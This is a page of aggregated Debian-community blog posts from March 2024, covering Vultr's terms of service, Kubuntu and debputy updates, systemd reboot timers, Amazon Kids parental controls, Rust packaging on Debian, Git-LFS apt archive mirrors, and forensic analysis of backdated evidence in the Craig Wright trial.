Search Results: "bas"

28 March 2024

Joey Hess: the vulture in the coal mine

Turns out that VPS provider Vultr's terms of service were quietly changed some time ago to give them a "perpetual, irrevocable" license to use content hosted there in any way, including modifying it and commercializing it "for purposes of providing the Services to you." This is very similar to changes that Github made to their TOS in 2017. Since then, Github has been rebranded as "The world s leading AI-powered developer platform". The language in their TOS now clearly lets them use content stored in Github for training AI. (Probably this is their second line of defense if the current attempt to legitimise copyright laundering via generative AI fails.) Vultr is currently in damage control mode, accusing their concerned customers of spreading "conspiracy theories" (-- founder David Aninowsky) and updating the TOS to remove some of the problem language. Although it still allows them to "make derivative works", so could still allow their AI division to scrape VPS images for training data. Vultr claims this was the legalese version of technical debt, that it only ever applied to posts in a forum (not supported by the actual TOS language) and basically that they and their lawyers are incompetant but not malicious. Maybe they are indeed incompetant. But even if I give them the benefit of the doubt, I expect that many other VPS providers, especially ones targeting non-corporate customers, are watching this closely. If Vultr is not significantly harmed by customers jumping ship, if the latest TOS change is accepted as good enough, then other VPS providers will know that they can try this TOS trick too. If Vultr's AI division does well, others will wonder to what extent it is due to having all this juicy training data. For small self-hosters, this seems like a good time to make sure you're using a VPS provider you can actually trust to not be eyeing your disk image and salivating at the thought of stripmining it for decades of emails. Probably also worth thinking about moving to bare metal hardware, perhaps hosted at home. I wonder if this will finally make it worthwhile to mess around with VPS TPMs?

Scarlett Gately Moore: Kubuntu, KDE Report. In Loving Memory of my Son.

Personal: As many of you know, I lost my beloved son March 9th. This has hit me really hard, but I am staying strong and holding on to all the wonderful memories I have. He grew up to be an amazing man, devoted christian and wonderful father. He was loved by everyone who knew him and will be truly missed by us all. I have had folks ask me how they can help. He left behind his 7 year old son Mason. Mason was Billy s world and I would like to make sure Mason is taken care of. I have set up a gofundme for Mason and all proceeds will go to the future care of him. https://gofund.me/25dbff0c

Work report Kubuntu: Bug bashing! I am triaging allthebugs for Plasma which can be seen here: https://bugs.launchpad.net/plasma-5.27/+bug/2053125 I am happy to report many of the remaining bugs have been fixed in the latest bug fix release 5.27.11. I prepared https://kde.org/announcements/plasma/5/5.27.11/ and Rik uploaded to archive, thank you. Unfortunately, this and several other key fixes are stuck in transition do to the time_t64 transition, which you can read about here: https://wiki.debian.org/ReleaseGoals/64bit-time . It is the biggest transition in Debian/Ubuntu history and it couldn t come at a worst time. We are aware our ISO installer is currently broken, calamares is one of those things stuck in this transition. There is a workaround in the comments of the bug report: https://bugs.launchpad.net/ubuntu/+source/calamares/+bug/2054795 Fixed an issue with plasma-welcome. Found the fix for emojis and Aaron has kindly moved this forward with the fontconfig maintainer. Thanks! I have received an https://kfocus.org/spec/spec-ir14.html laptop and it is truly a great machine and is now my daily driver. A big thank you to the Kfocus team! I can t wait to show it off at https://linuxfestnorthwest.org/. KDE Snaps: You will see the activity in this ramp back up as the KDEneon Core project is finally a go! I will participate in the project with part time status and get everyone in the Enokia team up to speed with my snap knowledge, help prepare the qt6/kf6 transition, package plasma, and most importantly I will focus on documentation for future contributors. I have created the ( now split ) qt6 with KDE patchset support and KDE frameworks 6 SDK and runtime snaps. I have made the kde-neon-6 extension and the PR is in: https://github.com/canonical/snapcraft/pull/4698 . Future work on the extension will include multiple versions track support and core24 support.

I have successfully created our first qt6/kf6 snap ark. They will show showing up in the store once all the required bits have been merged and published. Thank you for stopping by. ~Scarlett

24 March 2024

Niels Thykier: debputy v0.1.21

Earlier today, I have just released debputy version 0.1.21 to Debian unstable. In the blog post, I will highlight some of the new features.

Package boilerplate reduction with automatic relationship substvar Last month, I started a discussion on rethinking how we do relationship substvars such as the $ misc:Depends . These generally ends up being boilerplate runes in the form of Depends: $ misc:Depends , $ shlibs:Depends where you as the packager has to remember exactly which runes apply to your package. My proposed solution was to automatically apply these substvars and this feature has now been implemented in debputy. It is also combined with the feature where essential packages should use Pre-Depends by default for dpkg-shlibdeps related dependencies. I am quite excited about this feature, because I noticed with libcleri that we are now down to 3-5 fields for defining a simple library package. Especially since most C library packages are trivial enough that debputy can auto-derive them to be Multi-Arch: same. As an example, the libcleric1 package is down to 3 fields (Package, Architecture, Description) with Section and Priority being inherited from the Source stanza. I have submitted a MR to show case the boilerplate reduction at https://salsa.debian.org/siridb-team/libcleri/-/merge_requests/3. The removal of libcleric1 (= $ binary:Version ) in that MR relies on another existing feature where debputy can auto-derive a dependency between an arch:any -dev package and the library package based on the .so symlink for the shared library. The arch:any restriction comes from the fact that arch:all and arch:any packages are not built together, so debputy cannot reliably see across the package boundaries during the build (and therefore refuses to do so at all). Packages that have already migrated to debputy can use debputy migrate-from-dh to detect any unnecessary relationship substitution variables in case you want to clean up. The removal of Multi-Arch: same and intra-source dependencies must be done manually and so only be done so when you have validated that it is safe and sane to do. I was willing to do it for the show-case MR, but I am less confident that would bother with these for existing packages in general. Note: I summarized the discussion of the automatic relationship substvar feature earlier this month in https://lists.debian.org/debian-devel/2024/03/msg00030.html for those who want more details. PS: The automatic relationship substvars feature will also appear in debhelper as a part of compat 14.

Language Server (LSP) and Linting I have long been frustrated by our poor editor support for Debian packaging files. To this end, I started working on a Language Server (LSP) feature in debputy that would cover some of our standard Debian packaging files. This release includes the first version of said language server, which covers the following files:

debian/control

debian/copyright (the machine readable variant)

debian/changelog (mostly just spelling)

debian/rules

debian/debputy.manifest (syntax checks only; use debputy check-manifest for the full validation for now)

Most of the effort has been spent on the Deb822 based files such as debian/control, which comes with diagnostics, quickfixes, spellchecking (but only for relevant fields!), and completion suggestions. Since not everyone has a LSP capable editor and because sometimes you just want diagnostics without having to open each file in an editor, there is also a batch version for the diagnostics via debputy lint. Please see debputy(1) for how debputy lint compares with lintian if you are curious about which tool to use at what time. To help you getting started, there is a now debputy lsp editor-config command that can provide you with the relevant editor config glue. At the moment, emacs (via eglot) and vim with vim-youcompleteme are supported. For those that followed the previous blog posts on writing the language server, I would like to point out that the command line for running the language server has changed to debputy lsp server and you no longer have to tell which format it is. I have decided to make the language server a "polyglot" server for now, which I will hopefully not regret... Time will tell. :) Anyhow, to get started, you will want:

$ apt satisfy 'dh-debputy (>= 0.1.21~), python3-pygls'
# Optionally, for spellchecking
$ apt install python3-hunspell hunspell-en-us
# For emacs integration
$ apt install elpa-dpkg-dev-el markdown-mode-el
# For vim integration via vim-youcompleteme
$ apt install vim-youcompleteme

Specifically for emacs, I also learned two things after the upload. First, you can auto-activate eglot via eglot-ensure. This badly feature interacts with imenu on debian/changelog for reasons I do not understand (causing a several second start up delay until something times out), but it works fine for the other formats. Oddly enough, opening a changelog file and then activating eglot does not trigger this issue at all. In the next version, editor config for emacs will auto-activate eglot on all files except debian/changelog. The second thing is that if you install elpa-markdown-mode, emacs will accept and process markdown in the hover documentation provided by the language server. Accordingly, the editor config for emacs will also mention this package from the next version on. Finally, on a related note, Jelmer and I have been looking at moving some of this logic into a new package called debpkg-metadata. The point being to support easier reuse of linting and LSP related metadata - like pulling a list of known fields for debian/control or sharing logic between lintian-brush and debputy.

Minimal integration mode for Rules-Requires-Root One of the original motivators for starting debputy was to be able to get rid of fakeroot in our build process. While this is possible, debputy currently does not support most of the complex packaging features such as maintscripts and debconf. Unfortunately, the kind of packages that need fakeroot for static ownership tend to also require very complex packaging features. To bridge this gap, the new version of debputy supports a very minimal integration with dh via the dh-sequence-zz-debputy-rrr. This integration mode keeps the vast majority of debhelper sequence in place meaning most dh add-ons will continue to work with dh-sequence-zz-debputy-rrr. The sequence only replaces the following commands:

dh_fixperms

dh_gencontrol

dh_md5sums

dh_builddeb

The installations feature of the manifest will be disabled in this integration mode to avoid feature interactions with debhelper tools that expect debian/<pkg> to contain the materialized package. On a related note, the debputy migrate-from-dh command now supports a --migration-target option, so you can choose the desired level of integration without doing code changes. The command will attempt to auto-detect the desired integration from existing package features such as a build-dependency on a relevant dh sequence, so you do not have to remember this new option every time once the migration has started. :)

Jacob Adams: Regular Reboots

Uptime is often considered a measure of system reliability, an indication that the running software is stable and can be counted on. However, this hides the insidious build-up of state throughout the system as it runs, the slow drift from the expected to the strange. As Nolan Lawson highlights in an excellent post entitled Programmers are bad at managing state, state is the most challenging part of programming. It s why did you try turning it off and on again is a classic tech support response to any problem.

You: uptime

Me: Every machine gets rebooted at 1AM to clear the slate for maintenance, and at 3:30AM to push through any pending updates. @SwiftOnSecurity, December 27, 2020

In addition to the problem of state, installing regular updates periodically requires a reboot, even if the rest of the process is automated through a tool like unattended-upgrades. For my personal homelab, I manage a handful of different machines running various services. I used to just schedule a day to update and reboot all of them, but that got very tedious very quickly. I then moved the reboot to a cronjob, and then recently to a systemd timer and service. I figure that laying out my path to better management of this might help others, and will almost certainly lead to someone telling me a better way to do this. UPDATE: Turns out there s another option for better systemd cron integration. See systemd-cron below.

Ultimately, uptime only measures the duration since you last proved you can turn the machine on and have it boot. @SwiftOnSecurity, May 7, 2016

Stage One: Reboot Cron The first, and easiest approach, is a simple cron job. Just adding the following line to /var/spool/cron/crontabs/root¹ is enough to get your machine to reboot once a month² on the 6th at 8:00 AM³:

0 8 6 * * reboot

I had this configured for many years and it works well. But you have no indication as to whether it succeeds except for checking your uptime regularly yourself.

Stage Two: Reboot systemd Timer The next evolution of this approach for me was to use a systemd timer. I created a regular-reboot.timer with the following contents:

[Unit]
Description=Reboot on a Regular Basis
[Timer]
Unit=regular-reboot.service
OnBootSec=1month
[Install]
WantedBy=timers.target

This timer will trigger the regular-reboot.service systemd unit when the system reaches one month of uptime. I ve seen some guides to creating timer units recommend adding a Wants=regular-reboot.service to the [Unit] section, but this has the consequence of running that service every time it starts the timer. In this case that will just reboot your system on startup which is not what you want. Care needs to be taken to use the OnBootSec directive instead of OnCalendar or any of the other time specifications, as your system could reboot, discover its still within the expected window and reboot again. With OnBootSec your system will not have that problem. Technically, this same problem could have occurred with the cronjob approach, but in practice it never did, as the systems took long enough to come back up that they were no longer within the expected window for the job. I then added the regular-reboot.service:

[Unit]
Description=Reboot on a Regular Basis
Wants=regular-reboot.timer
[Service]
Type=oneshot
ExecStart=shutdown -r 02:45

You ll note that this service is actually scheduling a specific reboot time via the shutdown command instead of just immediately rebooting. This is a bit of a hack needed because I can t control when the timer runs exactly when using OnBootSec. This way different systems have different reboot times so that everything doesn t just reboot and fail all at once. Were something to fail to come back up I would have some time to fix it, as each machine has a few hours between scheduled reboots. One you have both files in place, you ll simply need to reload configuration and then enable and start the timer unit:

systemctl daemon-reload
systemctl enable --now regular-reboot.timer

You can then check when it will fire next:

# systemctl status regular-reboot.timer
  regular-reboot.timer - Reboot on a Regular Basis
     Loaded: loaded (/etc/systemd/system/regular-reboot.timer; enabled; preset: enabled)
     Active: active (waiting) since Wed 2024-03-13 01:54:52 EDT; 1 week 4 days ago
    Trigger: Fri 2024-04-12 12:24:42 EDT; 2 weeks 4 days left
   Triggers:   regular-reboot.service
Mar 13 01:54:52 dorfl systemd[1]: Started regular-reboot.timer - Reboot on a Regular Basis.

Sidenote: Replacing all Cron Jobs with systemd Timers More generally, I ve now replaced all cronjobs on my personal systems with systemd timer units, mostly because I can now actually track failures via `prometheus-node-exporter`. There are plenty of ways to hack in cron support to the node exporter, but just moving to systemd units provides both support for tracking failure and logging, both of which make system administration much easier when things inevitably go wrong.

`systemd-cron` An alternative to converting everything by hand, if you happen to have a lot of cronjobs is `systemd-cron`. It will make each crontab and `/etc/cron.*` directory into automatic service and timer units. Thanks to Alexandre Detiste for letting me know about this project. I have few enough cron jobs that I ve already converted, but for anyone looking at a large number of jobs to convert you ll want to check it out!

Stage Three: Monitor that it s working The final step here is confirm that these units actually work, beyond just firing regularly. I now have the following rule in my prometheus-alertmanager rules:

  - alert: UptimeTooHigh
    expr: (time() - node_boot_time_seconds job="node" ) / 86400 > 35
    annotations:
      summary: "Instance  Has Been Up Too Long!"
      description: "Instance  Has Been Up Too Long!"

This will trigger an alert anytime that I have a machine up for more than 35 days. This actually helped me track down one machine that I had forgotten to set up this new unit on⁴.

Not everything needs to scale One of the most common fallacies programmers fall into is that we will jump to automating a solution before we stop and figure out how much time it would even save. In taking a slow improvement route to solve this problem for myself, I ve managed not to invest too much time⁵ in worrying about this but also achieved a meaningful improvement beyond my first approach of doing it all by hand.

You could also add a line to `/etc/crontab` or drop a script into `/etc/cron.monthly` depending on your system.

Why once a month? Mostly to avoid regular disruptions, but still be reasonably timely on updates.

If you re looking to understand the cron time format I recommend crontab guru.

In the long term I really should set up something like ansible to automatically push fleetwide changes like this but with fewer machines than fingers this seems like overkill.

Of course by now writing about it, I ve probably doubled the amount of time I ve spent thinking about this topic but oh well

23 March 2024

Erich Schubert: Do not get Amazon Kids+ or a Fire HD Kids

The Amazon Kids parental controls are extremely insufficient, and I strongly advise against getting any of the Amazon Kids series. The initial permise (and some older reviews) look okay: you can set some time limits, and you can disable anything that requires buying. With the hardware you get one year of the Amazon Kids+ subscription, which includes a lot of interesting content such as books and audio, but also some apps. This seemed attractive: some learning apps, some decent games. Sometimes there seems to be a special Amazon Kids+ edition , supposedly one that has advertisements reduced/removed and no purchasing. However, there are so many things just wrong in Amazon Kids:

you have no control over the starting page of the tablet.
it is entirely up to Amazon to decide which contents are for your kid, and of course the page is as poorly made as possible
the main content control is a simple age filter
age appropriateness is decided by Amazon in a non-transparent way
there is no preview. All you get is one icon and a truncated title, no description, no screenshots, nothing.
time restrictions are on the most basic level possible (daily limit for weekdays and weekends), largely unusable
no easy way to temporarily increase the limit by 30 minutes, for example. You end up disabling it all the time.
there is some educational goals thing, but as you do not get to control what is educational and what not, it is paperweight
no per-app limits
this is a killer missing feature.
removing content is a very manual thing. You have to go through potentially thousands of entries, and disable them one-by-one for every kid.
some contents cannot even be removed anymore
managed by age filters and cannot be changed - these appear to be HTML5 and not real apps
there is no whitelist!
That is the really no-go. By using Amazon Kids, you fully expose your kids to the endless rabbit hole of apps.
you cannot switch to an alternate UI that has better parental controls
without sideloading, you cannot even get YouTube Kids (which still is not really good either) on it, as it does not have Google services.
and even with sideloading, you do not appear to be able to permanently replace the launcher anymore.

And, unfortunately, Amazon Kids is full of poor content for kids, such as DIY Fashion Star that I consider to be very dangerous for kids: it is extremely stereotypical, beginning with supposedly female color schemes, model-only body types, and judging people by their clothing (and body). You really thought you could hand-pick suitable apps for your kid on your own? No, you have to identify and remove such contents one by one, with many clicks each, because there is no whitelisting, and no mass-removal (anymore - apparently Amazon removed the workarounds that previously allowed you to mass remove contents). Not with Amazon Kids+, which apparently aims at raising the next generation of zombie customers that buy whatever you tell them to buy. Hence, do not get your kids an Amazon Fire HD tablet!

22 March 2024

Reproducible Builds (diffoscope): diffoscope 261 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 261. This version includes the following changes:

[ Chris Lamb ]
* Don't crash if we encounter an .rdb file without an equivalent .rdx file.
  (Closes: #1066991)
* In addition, don't identify Redis database dumps (etc.) as GNU R database
  files based simply on their filename. (Re: #1066991)
* Update copyright years.

You find out more by visiting the project homepage.

21 March 2024

Ian Jackson: How to use Rust on Debian (and Ubuntu, etc.)

tl;dr: Don t just apt install rustc cargo. Either do that and make sure to use only Rust libraries from your distro (with the tiresome config runes below); or, just use rustup.

Don t do the obvious thing; it s never what you want Debian ships a Rust compiler, and a large number of Rust libraries. But if you just do things the obvious default way, with apt install rustc cargo, you will end up using Debian s compiler but upstream libraries, directly and uncurated from crates.io. This is not what you want. There are about two reasonable things to do, depending on your preferences. Q. Download and run whatever code from the internet? The key question is this: Are you comfortable downloading code, directly from hundreds of upstream Rust package maintainers, and running it ? That s what cargo does. It s one of the main things it s for. Debian s cargo behaves, in this respect, just like upstream s. Let me say that again: Debian s cargo promiscuously downloads code from crates.io just like upstream cargo. So if you use Debian s cargo in the most obvious way, you are still downloading and running all those random libraries. The only thing you re avoiding downloading is the Rust compiler itself, which is precisely the part that is most carefully maintained, and of least concern. Debian s cargo can even download from crates.io when you re building official Debian source packages written in Rust: if you run dpkg-buildpackage, the downloading is suppressed; but a plain cargo build will try to obtain and use dependencies from the upstream ecosystem. ( Happily , if you do this, it s quite likely to bail out early due to version mismatches, before actually downloading anything.) Option 1: WTF, no I don t want curl bash OK, but then you must limit yourself to libraries available within Debian. Each Debian release provides a curated set. It may or may not be sufficient for your needs. Many capable programs can be written using the packages in Debian. But any upstream Rust project that you encounter is likely to be a pain to get working, unless their maintainers specifically intend to support this. (This is fairly rare, and the Rust tooling doesn t make it easy.) To go with this plan, apt install rustc cargo and put this in your configuration, in $HOME/.cargo/config.toml:

[source.debian-packages]
directory = "/usr/share/cargo/registry"
[source.crates-io]
replace-with = "debian-packages"

This causes cargo to look in /usr/share for dependencies, rather than downloading them from crates.io. You must then install the librust-FOO-dev packages for each of your dependencies, with apt. This will allow you to write your own program in Rust, and build it using cargo build. Option 2: Biting the curl bash bullet If you want to build software that isn t specifically targeted at Debian s Rust you will probably need to use packages from crates.io, not from Debian. If you re doing to do that, there is little point not using rustup to get the latest compiler. rustup s install rune is alarming, but cargo will be doing exactly the same kind of thing, only worse (because it trusts many more people) and more hidden. So in this case: do run the curl bash install rune. Hopefully the Rust project you are trying to build have shipped a Cargo.lock; that contains hashes of all the dependencies that they last used and tested. If you run cargo build --locked, cargo will only use those versions, which are hopefully OK. And you can run cargo audit to see if there are any reported vulnerabilities or problems. But you ll have to bootstrap this with cargo install --locked cargo-audit; cargo-audit is from the RUSTSEC folks who do care about these kind of things, so hopefully running their code (and their dependencies) is fine. Note the --locked which is needed because cargo s default behaviour is wrong. Privilege separation This approach is rather alarming. For my personal use, I wrote a privsep tool which allows me to run all this upstream Rust code as a separate user. That tool is nailing-cargo. It s not particularly well productised, or tested, but it does work for at least one person besides me. You may wish to try it out, or consider alternative arrangements. Bug reports and patches welcome. OMG what a mess Indeed. There are large number of technical and social factors at play. cargo itself is deeply troubling, both in principle, and in detail. I often find myself severely disappointed with its maintainers decisions. In mitigation, much of the wider Rust upstream community does takes this kind of thing very seriously, and often makes good choices. RUSTSEC is one of the results. Debian s technical arrangements for Rust packaging are quite dysfunctional, too: IMO the scheme is based on fundamentally wrong design principles. But, the Debian Rust packaging team is dynamic, constantly working the update treadmills; and the team is generally welcoming and helpful. Sadly last time I explored the possibility, the Debian Rust Team didn t have the appetite for more fundamental changes to the workflow (including, for example, changes to dependency version handling). Significant improvements to upstream cargo s approach seem unlikely, too; we can only hope that eventually someone might manage to supplant it.

edited 2024-03-21 21:49 to add a cut tag

comments

20 March 2024

Dirk Eddelbuettel: ciw 0.0.2 on CRAN: Updates

A first revision of the still only one-week old (at CRAN) package ciw has been released to CRAN! It provides is a single (efficient) function incoming() (now along with an alias ciw()) which summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with (still draft) wrapper ciw.r that will be part of the next littler release. For example, when I do this right now as I type this, I see (typically less than one second later)

edd@rob:~$ ciw.r 
    Folder                     Name                Time   Size         Age
    <char>                   <char>              <POSc> <char>  <difftime>
1: pretest instantiate_0.2.2.tar.gz 2024-03-20 13:29:00    17K  0.07 hours
2: recheck   tinytable_0.2.0.tar.gz 2024-03-20 12:50:00   565K  0.72 hours
3: pending      Matrix_1.7-0.tar.gz 2024-03-20 12:05:00   2.3M  1.47 hours
4: recheck      survey_4.4-2.tar.gz 2024-03-20 02:02:00   2.2M 11.52 hours
5: waiting   equateIRT_2.4.0.tar.gz 2024-03-19 17:00:00   895K 20.55 hours
6: pending   ravetools_0.1.5.tar.gz 2024-03-19 12:06:00   1.0M 25.45 hours
7: waiting     glmmTMB_1.1.9.tar.gz 2024-03-18 16:04:00   4.2M 45.48 hours
edd@rob:~$

See ciw.r --help or ciw.r --usage for more. Alternatively, in your R session, you can call ciw::incoming() (or now ciw::ciw()) for the same result (and/or load the package first). This release adds some packaging touches, brings the new alias ciw() as well as a state variable with all (known) folder names and some internal improvements for dealing with error conditions. The NEWS entry follows.

Changes in version 0.0.2 (2024-03-20)

The package README and DESCRIPTION have been expanded

An alias ciw can now be used for incoming

Network error handling is now more robist

A state variable known_folders lists all CRAN folders below incoming

Courtesy of my CRANberries, there is also a diffstat report for this release. If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

18 March 2024

Simon Josefsson: Apt archive mirrors in Git-LFS

My effort to improve transparency and confidence of public apt archives continues. I started to work on this in Apt Archive Transparency in which I mention the debdistget project in passing. Debdistget is responsible for mirroring index files for some public apt archives. I ve realized that having a publicly auditable and preserved mirror of the apt repositories is central to being able to do apt transparency work, so the debdistget project has become more central to my project than I thought. Currently I track Trisquel, PureOS, Gnuinos and their upstreams Ubuntu, Debian and Devuan. Debdistget download Release/Package/Sources files and store them in a git repository published on GitLab. Due to size constraints, it uses two repositories: one for the Release/InRelease files (which are small) and one that also include the Package/Sources files (which are large). See for example the repository for Trisquel release files and the Trisquel package/sources files. Repositories for all distributions can be found in debdistutils archives GitLab sub-group. The reason for splitting into two repositories was that the git repository for the combined files become large, and that some of my use-cases only needed the release files. Currently the repositories with packages (which contain a couple of months worth of data now) are 9GB for Ubuntu, 2.5GB for Trisquel/Debian/PureOS, 970MB for Devuan and 450MB for Gnuinos. The repository size is correlated to the size of the archive (for the initial import) plus the frequency and size of updates. Ubuntu s use of Apt Phased Updates (which triggers a higher churn of Packages file modifications) appears to be the primary reason for its larger size. Working with large Git repositories is inefficient and the GitLab CI/CD jobs generate quite some network traffic downloading the git repository over and over again. The most heavy user is the debdistdiff project that download all distribution package repositories to do diff operations on the package lists between distributions. The daily job takes around 80 minutes to run, with the majority of time is spent on downloading the archives. Yes I know I could look into runner-side caching but I dislike complexity caused by caching. Fortunately not all use-cases requires the package files. The debdistcanary project only needs the Release/InRelease files, in order to commit signatures to the Sigstore and Sigsum transparency logs. These jobs still run fairly quickly, but watching the repository size growth worries me. Currently these repositories are at Debian 440MB, PureOS 130MB, Ubuntu/Devuan 90MB, Trisquel 12MB, Gnuinos 2MB. Here I believe the main size correlation is update frequency, and Debian is large because I track the volatile unstable. So I hit a scalability end with my first approach. A couple of months ago I solved this by discarding and resetting these archival repositories. The GitLab CI/CD jobs were fast again and all was well. However this meant discarding precious historic information. A couple of days ago I was reaching the limits of practicality again, and started to explore ways to fix this. I like having data stored in git (it allows easy integration with software integrity tools such as GnuPG and Sigstore, and the git log provides a kind of temporal ordering of data), so it felt like giving up on nice properties to use a traditional database with on-disk approach. So I started to learn about Git-LFS and understanding that it was able to handle multi-GB worth of data that looked promising. Fairly quickly I scripted up a GitLab CI/CD job that incrementally update the Release/Package/Sources files in a git repository that uses Git-LFS to store all the files. The repository size is now at Ubuntu 650kb, Debian 300kb, Trisquel 50kb, Devuan 250kb, PureOS 172kb and Gnuinos 17kb. As can be expected, jobs are quick to clone the git archives: debdistdiff pipelines went from a run-time of 80 minutes down to 10 minutes which more reasonable correlate with the archive size and CPU run-time. The LFS storage size for those repositories are at Ubuntu 15GB, Debian 8GB, Trisquel 1.7GB, Devuan 1.1GB, PureOS/Gnuinos 420MB. This is for a couple of days worth of data. It seems native Git is better at compressing/deduplicating data than Git-LFS is: the combined size for Ubuntu is already 15GB for a couple of days data compared to 8GB for a couple of months worth of data with pure Git. This may be a sub-optimal implementation of Git-LFS in GitLab but it does worry me that this new approach will be difficult to scale too. At some level the difference is understandable, Git-LFS probably store two different Packages files around 90MB each for Trisquel as two 90MB files, but native Git would store it as one compressed version of the 90MB file and one relatively small patch to turn the old files into the next file. So the Git-LFS approach surprisingly scale less well for overall storage-size. Still, the original repository is much smaller, and you usually don t have to pull all LFS files anyway. So it is net win. Throughout this work, I kept thinking about how my approach relates to Debian s snapshot service. Ultimately what I would want is a combination of these two services. To have a good foundation to do transparency work I would want to have a collection of all Release/Packages/Sources files ever published, and ultimately also the source code and binaries. While it makes sense to start on the latest stable releases of distributions, this effort should scale backwards in time as well. For reproducing binaries from source code, I need to be able to securely find earlier versions of binary packages used for rebuilds. So I need to import all the Release/Packages/Sources packages from snapshot into my repositories. The latency to retrieve files from that server is slow so I haven t been able to find an efficient/parallelized way to download the files. If I m able to finish this, I would have confidence that my new Git-LFS based approach to store these files will scale over many years to come. This remains to be seen. Perhaps the repository has to be split up per release or per architecture or similar. Another factor is storage costs. While the git repository size for a Git-LFS based repository with files from several years may be possible to sustain, the Git-LFS storage size surely won t be. It seems GitLab charges the same for files in repositories and in Git-LFS, and it is around $500 per 100GB per year. It may be possible to setup a separate Git-LFS backend not hosted at GitLab to serve the LFS files. Does anyone know of a suitable server implementation for this? I had a quick look at the Git-LFS implementation list and it seems the closest reasonable approach would be to setup the Gitea-clone Forgejo as a self-hosted server. Perhaps a cloud storage approach a la S3 is the way to go? The cost to host this on GitLab will be manageable for up to ~1TB ($5000/year) but scaling it to storing say 500TB of data would mean an yearly fee of $2.5M which seems like poor value for the money. I realized that ultimately I would want a git repository locally with the entire content of all apt archives, including their binary and source packages, ever published. The storage requirements for a service like snapshot (~300TB of data?) is today not prohibitly expensive: 20TB disks are $500 a piece, so a storage enclosure with 36 disks would be around $18.000 for 720TB and using RAID1 means 360TB which is a good start. While I have heard about ~TB-sized Git-LFS repositories, would Git-LFS scale to 1PB? Perhaps the size of a git repository with multi-millions number of Git-LFS pointer files will become unmanageable? To get started on this approach, I decided to import a mirror of Debian s bookworm for amd64 into a Git-LFS repository. That is around 175GB so reasonable cheap to host even on GitLab ($1000/year for 200GB). Having this repository publicly available will make it possible to write software that uses this approach (e.g., porting debdistreproduce), to find out if this is useful and if it could scale. Distributing the apt repository via Git-LFS would also enable other interesting ideas to protecting the data. Consider configuring apt to use a local file:// URL to this git repository, and verifying the git checkout using some method similar to Guix s approach to trusting git content or Sigstore s gitsign. A naive push of the 175GB archive in a single git commit ran into pack size limitations: remote: fatal: pack exceeds maximum allowed size (4.88 GiB) however breaking up the commit into smaller commits for parts of the archive made it possible to push the entire archive. Here are the commands to create this repository:

git init
git lfs install
git lfs track 'dists/**' 'pool/**'
git add .gitattributes
git commit -m"Add Git-LFS track attributes." .gitattributes
time debmirror --method=rsync --host ftp.se.debian.org --root :debian --arch=amd64 --source --dist=bookworm,bookworm-updates --section=main --verbose --diff=none --keyring /usr/share/keyrings/debian-archive-keyring.gpg --ignore .git .
git add dists project
git commit -m"Add." -a
git remote add origin git@gitlab.com:debdistutils/archives/debian/mirror.git
git push --set-upstream origin --all
for d in pool//; do
   echo $d;
   time git add $d;
   git commit -m"Add $d." -a
   git push
done

The resulting repository size is around 27MB with Git LFS object storage around 174GB. I think this approach would scale to handle all architectures for one release, but working with a single git repository for all releases for all architectures may lead to a too large git repository (>1GB). So maybe one repository per release? These repositories could also be split up on a subset of pool/ files, or there could be one repository per release per architecture or sources. Finally, I have concerns about using SHA1 for identifying objects. It seems both Git and Debian s snapshot service is currently using SHA1. For Git there is SHA-256 transition and it seems GitLab is working on support for SHA256-based repositories. For serious long-term deployment of these concepts, it would be nice to go for SHA256 identifiers directly. Git-LFS already uses SHA256 but Git internally uses SHA1 as does the Debian snapshot service. What do you think? Happy Hacking!

14 March 2024

Matthew Garrett: Digital forgeries are hard

Closing arguments in the trial between various people and Craig Wright over whether he's Satoshi Nakamoto are wrapping up today, amongst a bewildering array of presented evidence. But one utterly astonishing aspect of this lawsuit is that expert witnesses for both sides agreed that much of the digital evidence provided by Craig Wright was unreliable in one way or another, generally including indications that it wasn't produced at the point in time it claimed to be. And it's fascinating reading through the subtle (and, in some cases, not so subtle) ways that that's revealed.

One of the pieces of evidence entered is screenshots of data from Mind Your Own Business, a business management product that's been around for some time. Craig Wright relied on screenshots of various entries from this product to support his claims around having controlled meaningful number of bitcoin before he was publicly linked to being Satoshi. If these were authentic then they'd be strong evidence linking him to the mining of coins before Bitcoin's public availability. Unfortunately the screenshots themselves weren't contemporary - the metadata shows them being created in 2020. This wouldn't fundamentally be a problem (it's entirely reasonable to create new screenshots of old material), as long as it's possible to establish that the material shown in the screenshots was created at that point. Sadly, well.

One part of the disclosed information was an email that contained a zip file that contained a raw database in the format used by MYOB. Importing that into the tool allowed an audit record to be extracted - this record showed that the relevant entries had been added to the database in 2020, shortly before the screenshots were created. This was, obviously, not strong evidence that Craig had held Bitcoin in 2009. This evidence was reported, and was responded to with a couple of additional databases that had an audit trail that was consistent with the dates in the records in question. Well, partially. The audit record included session data, showing an administrator logging into the data base in 2011 and then, uh, logging out in 2023, which is rather more consistent with someone changing their system clock to 2011 to create an entry, and switching it back to present day before logging out. In addition, the audit log included fields that didn't exist in versions of the product released before 2016, strongly suggesting that the entries dated 2009-2011 were created in software released after 2016. And even worse, the order of insertions into the database didn't line up with calendar time - an entry dated before another entry may appear in the database afterwards, indicating that it was created later. But even more obvious? The database schema used for these old entries corresponded to a version of the software released in 2023.

This is all consistent with the idea that these records were created after the fact and backdated to 2009-2011, and that after this evidence was made available further evidence was created and backdated to obfuscate that. In an unusual turn of events, during the trial Craig Wright introduced further evidence in the form of a chain of emails to his former lawyers that indicated he had provided them with login details to his MYOB instance in 2019 - before the metadata associated with the screenshots. The implication isn't entirely clear, but it suggests that either they had an opportunity to examine this data before the metadata suggests it was created, or that they faked the data? So, well, the obvious thing happened, and his former lawyers were asked whether they received these emails. The chain consisted of three emails, two of which they confirmed they'd received. And they received a third email in the chain, but it was different to the one entered in evidence. And, uh, weirdly, they'd received a copy of the email that was submitted - but they'd received it a few days earlier. In 2024.

And again, the forensic evidence is helpful here! It turns out that the email client used associates a timestamp with any attachments, which in this case included an image in the email footer - and the mysterious time travelling email had a timestamp in 2024, not 2019. This was created by the client, so was consistent with the email having been sent in 2024, not being sent in 2019 and somehow getting stuck somewhere before delivery. The date header indicates 2019, as do encoded timestamps in the MIME headers - consistent with the mail being sent by a computer with the clock set to 2019.

